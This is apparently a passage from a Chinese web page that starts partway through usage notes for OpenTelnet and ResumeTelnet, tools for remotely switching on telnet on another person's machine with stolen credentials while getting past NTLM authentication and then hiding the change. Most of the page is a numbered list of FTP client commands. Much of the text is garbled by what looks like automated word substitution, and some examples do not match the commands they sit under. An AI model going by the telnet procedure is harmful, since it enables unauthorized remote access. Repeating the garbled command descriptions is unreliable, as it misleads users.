IP 帐号 密码 ntlm认证方式 Telnet端口
(没有供给上传ntlm.exe破坏微软的身份验证形式卡塔尔国直接远程开启对方的telnet服务后,就可用telnet
ip 连接上对方。

NTLM认证方式:0:不选拔NTLM身份验证;1:先品尝NTLM身份验证,如果退步,再利用顾客名和密码;2:只行使NTLM身份验证。

ResumeTelnet.exe (OpenTelnet附带的另四个工具卡塔 尔(英语:State of Qatar)

resumetelnet.exe
IP 帐号 密码
用Telnet连接完对方后,就用那个命令将对方的Telnet设置还原,并同有的时候间关闭Telnet服务。

FTP命令安详严整

FTP命令是Internet顾客使用最频仍的下令之大器晚成,熟习并灵活使用FTP的里头命令,能够大大有利使用者,并接收一本万利之效。要是您想上学应用举行后台FTP下载,那么就非得学习FTP指令。

FTP的授命行格式为:

ftp -v -d -i -n -g
[主机名]
,其中

-v 展现远程服务器的持有响应新闻

-n 约束ftp的全自动登入,即不行使;.n etrc文件;

-d 使用调节和测量试验情势;

-g 撤消全局文件名。

FTP使用的其间命令日常来讲(中括号表示可选择卡塔尔国:

1.![cmd[args]]:在本地机中试行人机联作shell,exit回到ftp情状,如:!ls*.zip

2.$
macro-ame[args]:执行宏定义macro-name。

3.account[password]:提供登入远程系统成功后走访系统能源所需的补充口令。

4.append
local-file[remote-file]:将当半夏件增到长途系统主机,若未钦点远程系统文件名,则运用当三步跳件名。

5.ascii:使用ascii类型传输格局。

6.bell:各样命令推行实现后Computer响铃一遍。

7.bin:使用二进制文件传输格局。

8.bye:退出ftp会话进度。

9.case:在接收mget时,将长途主机文件名中的大写转为小写字母。

  1. cd remote-dir:步入远程主机目录。

11.cdup:步向远程主机目录的父目录。

12.chmod mode
file-name:将远程主机文件file-name的存取形式设置为mode,如:chmod 777
a.out。

13.close:中断与长途服务器的ftp会话(与open对应卡塔 尔(阿拉伯语:قطر‎。

14 .cr:使用asscii情势传输文件时,将回车换行调换为回行。

15.delete
remote-file:删除远程主机文件。

16.debug[debug-value]:设置调节和测量试验方式,
展现发送至远程主机的每条命令,如:deb up 3,若设为0,表示废除debug。

17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入当地文件。

18.disconnection:同close。

19.form format:将文件传输格局设置为format,缺省为file方式。

20.get
remote-file[local-file]:将长途主机的文件remote-file传至当地硬盘的local-file。

21.glob:设置mdelete,mget,mput的文件名扩大,缺省时不增添文件名,同命令行的-g参数。

22.hash:每传输1024字节,呈现多个hash符号(#)。

23.help[cmd]:显示ftp内部命令cmd的推推搡搡音信,如:help
get。

24.idle[seconds]:将远程服务器的休眠沙漏设为[seconds]秒。

25.image:设置二进制传输形式(同binary卡塔 尔(阿拉伯语:قطر‎。

26.lcd[dir]:将地面专门的工作目录切换至dir。

  1. ls[remote-dir][local-file]:呈现远程目录remote-dir,
    并存入本三步跳件local-file。

28.macdef
macro-name:定义叁个宏,蒙受macdef下的空行时,宏定义结束。

29.mdelete[remote-file]:删除远程主机文件。

30.mdir remote-files local-file:与dir相仿,但可钦命八个长途文件,如
:mdir *.o.*.zipoutfile。

31.mget remote-files:传输五个长途文件。

32.mkdir dir-name:在长间隔主机中国建工业总集结团一索引。

33.mls remote-file local-file:同nlist,但可钦命三个文件名。

34.mode[modename]:将文件传输情势设置为modename, 缺省为stream方式。

35.modtime file-name:呈现远程主机文件的结尾改革时间。

36.mput
local-file:将多少个文件传输至远程主机。

37.newer
file-name:尽管远程机中file-name的改正时间比本地硬盘同名文件的光阴更近,则重传该文件。

38.nlist[remote-dir][local-file]:展现远程主机目录的文书清单,并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]:设置文件名映射机制,
使得文件传输时,文件中的有个别字符相互调换, 如:nmap
$1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。该命令极度适用于远程主机为非UNIX机的景况。

40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1凯雷德,则文件名LLL将改成传祺奥迪Q5智跑。

41.open host[port]:创建钦命ftp服务器连接,可钦定连接端口。

42.passive:步入被动传输情势。

43.prompt:设置多个文件传输时的并行提醒。

44.proxy
ftp-cmd:在其次调整连接中,实行一条ftp命令,
该命令允许连接多个ftp服务器,以在七个劳务器间传输文件。第一条ftp命令必须为open,以率先创立多少个服务器间的接连。

45.put local-file[remote-file]:将当半夏件local-file传送至远程主机。

46.pwd:展现远程主机的当前专门的职业目录。

47.quit:同bye,退出ftp会话。

48.quote arg1,arg2…:将参数逐字发至远程ftp服务器,如:quote syst.

49.recv remote-file[local-file]:同get。

50.reget remote-file[local-file]:近似于get,
但若local-file存在,则从上次传输中断处续传。

51.rhelp[cmd-name]:需要获得远程主机的帮助。

52.rstatus[file-name]:若未钦点文件名,则显得远程主机的气象,
不然突显文件状态。

53.rename[from][to]:改革远程主机文件名。

54.reset:消亡回答队列。

55.restart marker:从钦赐的评释marker处,重新最初get或put,如:restart
130。

56.rmdir
dir-name:删除远程主机目录。

57.runique:设置文件名只意气风发性存款和储蓄,若文件存在,则在原著件后加后缀.1,
.2等。

58.send local-file[remote-file]:同put。

59.sendport:设置PORT命令的应用。

60.site arg1,arg2…:将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name:呈现远程主机文件大小,如:site idle 7200。

62.status:突显当前ftp状态。

63.struct[struct-name]:将文件传输结构安装为struct-name,
缺省时接收stream结构。

64.sunique:将长途主机文件名存款和储蓄装置为只生机勃勃(与runique对应卡塔尔国。

65.system:展现远程主机的操作系统类型。

66.tenex:将文件传输类型设置为TENEX机的所需的门类。

67.tick:设置传输时的字节计数器。

68.trace:设置包追踪。

69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type
binary,设置二进制传输情势。

70.umask[newmask]:将长途服务器的缺省umask设置为newmask,如:umask 3

71.user
user-name[password][account]:向远程主机标识本身的地点,需求口令时,必需输入口令,如:user
anonymous my@email。

72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的具有响
应都将呈现给客商,缺省为on.

73.?[cmd]:同help.

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图
Copyright @ 2010-2020 曾氏贵宾会 版权所有